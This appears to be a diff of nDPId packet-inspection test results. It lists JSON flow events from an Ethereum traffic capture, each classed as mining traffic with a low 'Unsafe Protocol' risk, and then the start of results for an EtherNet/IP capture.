00805{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":63,"flow_state":"finished","flow_packets_processed":36,"flow_first_seen":1578508365701,"flow_last_seen":1578508365828,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":386,"flow_tot_l4_payload_len":1046,"flow_avg_l4_payload_len":29,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"139.162.255.210","src_port":56672,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
00805{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"finished","flow_packets_processed":42,"flow_first_seen":1578508364523,"flow_last_seen":1578508365223,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":1275,"flow_avg_l4_payload_len":30,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"191.234.162.198","src_port":56620,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
00804{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"finished","flow_packets_processed":16,"flow_first_seen":1578508365094,"flow_last_seen":1578508365839,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":522,"flow_tot_l4_payload_len":1202,"flow_avg_l4_payload_len":75,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"182.162.161.61","src_port":56647,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
00805{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"finished","flow_packets_processed":62,"flow_first_seen":1578508364924,"flow_last_seen":1578508365071,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":494,"flow_tot_l4_payload_len":2045,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"209.250.240.205","src_port":56638,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
00804{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"finished","flow_packets_processed":39,"flow_first_seen":1578508364932,"flow_last_seen":1578508365309,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":521,"flow_tot_l4_payload_len":1315,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"18.219.167.159","src_port":56639,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
00803{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"finished","flow_packets_processed":35,"flow_first_seen":1578508364659,"flow_last_seen":1578508365043,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":431,"flow_tot_l4_payload_len":1158,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"40.67.144.128","src_port":56630,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
00803{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"finished","flow_packets_processed":42,"flow_first_seen":1578508364523,"flow_last_seen":1578508365511,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":525,"flow_tot_l4_payload_len":1280,"flow_avg_l4_payload_len":30,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"52.187.207.27","src_port":56621,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
00803{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":67,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1578508365828,"flow_last_seen":1578508366083,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":404,"flow_tot_l4_payload_len":404,"flow_avg_l4_payload_len":101,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"13.251.14.199","src_port":56678,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
00805{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":63,"flow_state":"finished","flow_packets_processed":36,"flow_first_seen":1578508365701,"flow_last_seen":1578508365828,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":386,"flow_tot_l4_payload_len":1046,"flow_avg_l4_payload_len":29,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"139.162.255.210","src_port":56672,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
00805{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"finished","flow_packets_processed":42,"flow_first_seen":1578508364523,"flow_last_seen":1578508365223,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":1275,"flow_avg_l4_payload_len":30,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"191.234.162.198","src_port":56620,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
00804{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"finished","flow_packets_processed":16,"flow_first_seen":1578508365094,"flow_last_seen":1578508365839,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":522,"flow_tot_l4_payload_len":1202,"flow_avg_l4_payload_len":75,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"182.162.161.61","src_port":56647,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
00805{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"finished","flow_packets_processed":62,"flow_first_seen":1578508364924,"flow_last_seen":1578508365071,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":494,"flow_tot_l4_payload_len":2045,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"209.250.240.205","src_port":56638,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
00804{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"finished","flow_packets_processed":39,"flow_first_seen":1578508364932,"flow_last_seen":1578508365309,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":521,"flow_tot_l4_payload_len":1315,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"18.219.167.159","src_port":56639,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
00803{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"finished","flow_packets_processed":35,"flow_first_seen":1578508364659,"flow_last_seen":1578508365043,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":431,"flow_tot_l4_payload_len":1158,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"40.67.144.128","src_port":56630,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
00803{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"finished","flow_packets_processed":42,"flow_first_seen":1578508364523,"flow_last_seen":1578508365511,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":525,"flow_tot_l4_payload_len":1280,"flow_avg_l4_payload_len":30,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"52.187.207.27","src_port":56621,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
00803{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":67,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1578508365828,"flow_last_seen":1578508366083,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":404,"flow_tot_l4_payload_len":404,"flow_avg_l4_payload_len":101,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"13.251.14.199","src_port":56678,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
00805{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1578508364382,"flow_last_seen":1578508364650,"flow_idle_time":180000,"flow_min_l4_payload_len":171,"flow_max_l4_payload_len":1057,"flow_tot_l4_payload_len":1653,"flow_avg_l4_payload_len":551,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"18.138.108.67","src_port":30303,"dst_port":30303,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
00803{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":66,"flow_state":"finished","flow_packets_processed":30,"flow_first_seen":1578508365751,"flow_last_seen":1578508365853,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":530,"flow_tot_l4_payload_len":1396,"flow_avg_l4_payload_len":46,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"35.235.37.216","src_port":56675,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
00802{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":72,"flow_state":"finished","flow_packets_processed":24,"flow_first_seen":1578508366005,"flow_last_seen":1578508366135,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":561,"flow_tot_l4_payload_len":1439,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"51.83.237.44","src_port":56684,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
00803{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":66,"flow_state":"finished","flow_packets_processed":30,"flow_first_seen":1578508365751,"flow_last_seen":1578508365853,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":530,"flow_tot_l4_payload_len":1396,"flow_avg_l4_payload_len":46,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"35.235.37.216","src_port":56675,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
00802{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":72,"flow_state":"finished","flow_packets_processed":24,"flow_first_seen":1578508366005,"flow_last_seen":1578508366135,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":561,"flow_tot_l4_payload_len":1439,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"51.83.237.44","src_port":56684,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
00802{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1578508364422,"flow_last_seen":1578508365065,"flow_idle_time":180000,"flow_min_l4_payload_len":128,"flow_max_l4_payload_len":171,"flow_tot_l4_payload_len":448,"flow_avg_l4_payload_len":149,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"66.42.82.246","src_port":30303,"dst_port":30303,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
00803{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":62,"flow_state":"finished","flow_packets_processed":48,"flow_first_seen":1578508365592,"flow_last_seen":1578508365773,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":540,"flow_tot_l4_payload_len":1832,"flow_avg_l4_payload_len":38,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"86.107.243.62","src_port":56671,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
00803{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":73,"flow_state":"finished","flow_packets_processed":12,"flow_first_seen":1578508366020,"flow_last_seen":1578508366101,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":580,"flow_tot_l4_payload_len":1153,"flow_avg_l4_payload_len":96,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"88.99.93.219","src_port":56685,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
00804{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"finished","flow_packets_processed":31,"flow_first_seen":1578508364522,"flow_last_seen":1578508365036,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":458,"flow_tot_l4_payload_len":1241,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"162.243.160.83","src_port":56613,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
00804{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"finished","flow_packets_processed":31,"flow_first_seen":1578508365009,"flow_last_seen":1578508365126,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":540,"flow_tot_l4_payload_len":1312,"flow_avg_l4_payload_len":42,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"144.91.120.135","src_port":56641,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
00803{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"finished","flow_packets_processed":44,"flow_first_seen":1578508364824,"flow_last_seen":1578508365152,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":571,"flow_tot_l4_payload_len":1388,"flow_avg_l4_payload_len":31,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"159.203.84.31","src_port":56634,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
00803{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":62,"flow_state":"finished","flow_packets_processed":48,"flow_first_seen":1578508365592,"flow_last_seen":1578508365773,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":540,"flow_tot_l4_payload_len":1832,"flow_avg_l4_payload_len":38,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"86.107.243.62","src_port":56671,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
00803{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":73,"flow_state":"finished","flow_packets_processed":12,"flow_first_seen":1578508366020,"flow_last_seen":1578508366101,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":580,"flow_tot_l4_payload_len":1153,"flow_avg_l4_payload_len":96,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"88.99.93.219","src_port":56685,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
00804{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"finished","flow_packets_processed":31,"flow_first_seen":1578508364522,"flow_last_seen":1578508365036,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":458,"flow_tot_l4_payload_len":1241,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"162.243.160.83","src_port":56613,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
00804{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"finished","flow_packets_processed":31,"flow_first_seen":1578508365009,"flow_last_seen":1578508365126,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":540,"flow_tot_l4_payload_len":1312,"flow_avg_l4_payload_len":42,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"144.91.120.135","src_port":56641,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
00803{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"finished","flow_packets_processed":44,"flow_first_seen":1578508364824,"flow_last_seen":1578508365152,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":571,"flow_tot_l4_payload_len":1388,"flow_avg_l4_payload_len":31,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"159.203.84.31","src_port":56634,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
00565{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","packets-captured":2000,"packets-processed":2000,"total-skipped-flows":0,"total-l4-data-len":86968,"total-not-detected-flows":0,"total-guessed-flows":3,"total-detected-flows":71,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":74,"total-idle-flows":74,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":432,"global_ts_msec":1578508366135}
~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~
~~ packets captured/processed: 2000/2000

48
test/results/ethernetIP.pcap.out
View File

@@ -1,29 +1,29 @@
00461{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"ethernetIP.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32,"global_ts_msec":0}
00547{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"ethernetIP.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-data-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1352718180263}
00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"ethernetIP.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1352718180263,"flow_last_seen":1352718180263,"flow_idle_time":7440000,"flow_min_l4_payload_len":82,"flow_max_l4_payload_len":82,"flow_tot_l4_payload_len":82,"flow_avg_l4_payload_len":82,"midstream":1,"thread_ts_msec":1352718180263,"l3_proto":"ip4","src_ip":"141.81.0.10","dst_ip":"141.81.0.83","src_port":50275,"dst_port":44818,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
